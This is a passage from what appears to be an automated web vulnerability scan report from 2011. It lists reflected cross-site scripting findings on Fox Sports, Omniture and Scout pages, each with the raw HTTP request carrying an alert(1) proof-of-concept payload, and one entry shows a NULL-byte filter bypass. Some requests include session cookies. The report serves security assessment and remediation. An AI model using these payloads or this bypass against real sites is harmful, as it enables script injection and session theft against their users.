GET /collegefootball/lists/scout-top-25-team-recruit-rankings?14d4a'-alert(1)-'ab313af8cd3=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 242788 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=53 Date: Wed, 02 Feb 2011 15:37:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '24'); // load up team comments </script> ...[SNIP]...
1.145. http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93cfb'-alert(1)-'bea40c5b74b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111?93cfb'-alert(1)-'bea40c5b74b=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 256587 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=43 Date: Wed, 02 Feb 2011 15:37:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26511070'); // load up team comments </script> ...[SNIP]...
1.146. http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dcc0'-alert(1)-'c4dbd5116c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111?2dcc0'-alert(1)-'c4dbd5116c5=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 245955 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=36 Date: Wed, 02 Feb 2011 15:37:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26546002'); // load up team comments </script> ...[SNIP]...
1.147. http://msn.foxsports.com/nba/page/heat-or-threepeat [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nba/page/heat-or-threepeat
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d60'-alert(1)-'1f301dec17c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/page/heat-or-threepeat?f4d60'-alert(1)-'1f301dec17c=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 247480 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=22 Date: Wed, 02 Feb 2011 15:37:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', 'EVENT_295449'); // load up team comments </script> ...[SNIP]...
1.148. http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nba/story/Mavericks-102-Wizards-92-01372633
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f35a8'-alert(1)-'4bf9c40ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Mavericks-102-Wizards-92-01372633?f35a8'-alert(1)-'4bf9c40ab7=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 250652 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=11 Date: Wed, 02 Feb 2011 15:37:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26551003'); // load up team comments </script> ...[SNIP]...
1.149. http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42b34'-alert(1)-'dc8cb17c584 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111?42b34'-alert(1)-'dc8cb17c584=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 261871 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=7 Date: Wed, 02 Feb 2011 15:37:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 104a6'-alert(1)-'eed66588032 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002104a6'-alert(1)-'eed66588032 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 227087 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=48 Date: Wed, 02 Feb 2011 15:37:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '5'); // load up team comments </script> ...[SNIP]...
1.151. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nfl/lists/Top_10_Super_Bowl_Goats
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3309'-alert(1)-'0aa3faa4c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Goats?a3309'-alert(1)-'0aa3faa4c6a=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 226893 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=17 Date: Tue, 01 Feb 2011 15:36:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14557'-alert(1)-'f363dc20028 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Heroes?GT1=3900214557'-alert(1)-'f363dc20028 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 226622 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=45 Date: Wed, 02 Feb 2011 15:37:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '5'); // load up team comments </script> ...[SNIP]...
1.153. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nfl/lists/Top_10_Super_Bowl_Heroes
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7fd'-alert(1)-'350d2cec32c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Heroes?bb7fd'-alert(1)-'350d2cec32c=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 226451 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=17 Date: Tue, 01 Feb 2011 15:36:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feba4'-alert(1)-'a1c1bd68b1d was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?gt1=39002feba4'-alert(1)-'a1c1bd68b1d HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 252008 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=10 Date: Wed, 02 Feb 2011 15:37:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26544030'); // load up team comments </script> ...[SNIP]...
1.155. http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b9d2'-alert(1)-'f94768913cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 248480 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=21 Date: Tue, 01 Feb 2011 15:36:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1';
startComments('StoryComments', '26544030'); // load up team comments </script> ...[SNIP]...
1.156. http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a43a0'-alert(1)-'a64d4955fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206?a43a0'-alert(1)-'a64d4955fc7=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 253613 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=7 Date: Wed, 02 Feb 2011 15:37:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26569115'); // load up team comments </script> ...[SNIP]...
1.157. http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ab0'-alert(1)-'e3786f32ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111?85ab0'-alert(1)-'e3786f32ad=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 258371 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=7 Date: Wed, 02 Feb 2011 15:37:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26541133'); // load up team comments </script> ...[SNIP]...
1.158. http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4410'-alert(1)-'23ffae24f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111?d4410'-alert(1)-'23ffae24f86=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 258524 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=6 Date: Wed, 02 Feb 2011 15:37:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26554000'); // load up team comments </script> ...[SNIP]...
1.159. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://my.omniture.com
Path:
/login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a79"-alert(1)-"7f4bdae527e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jpj request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a15"-alert(1)-"9e4c75fec7b was submitted in the jpj parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b HTTP/1.1 Host: my.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 19:32:17 GMT Server: Omniture AWS/2.0.0 Vary: Accept-Encoding,User-Agent xserver: www645 Content-Type: text/html Connection: close Content-Length: 27728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
1.161. https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://my.omniture.com
Path:
/p/suite/1.2/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfe1"-alert(1)-"79f9f86c119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1 HTTP/1.1 Host: my.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 19:33:35 GMT Server: Omniture AWS/2.0.0 Vary: Accept-Encoding,User-Agent xserver: www453 Content-Type: text/html Connection: close Content-Length: 27828
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the ssSession request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e86ee"-alert(1)-"66ebe3920b5 was submitted in the ssSession parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132 HTTP/1.1 Host: my.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 19:31:44 GMT Server: Omniture AWS/2.0.0 Vary: Accept-Encoding,User-Agent xserver: www460 Content-Type: text/html Connection: close Content-Length: 27586
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00412f4'-alert(1)-'956e390f61d was submitted in the c parameter. This input was echoed as 412f4'-alert(1)-'956e390f61d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=2011 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
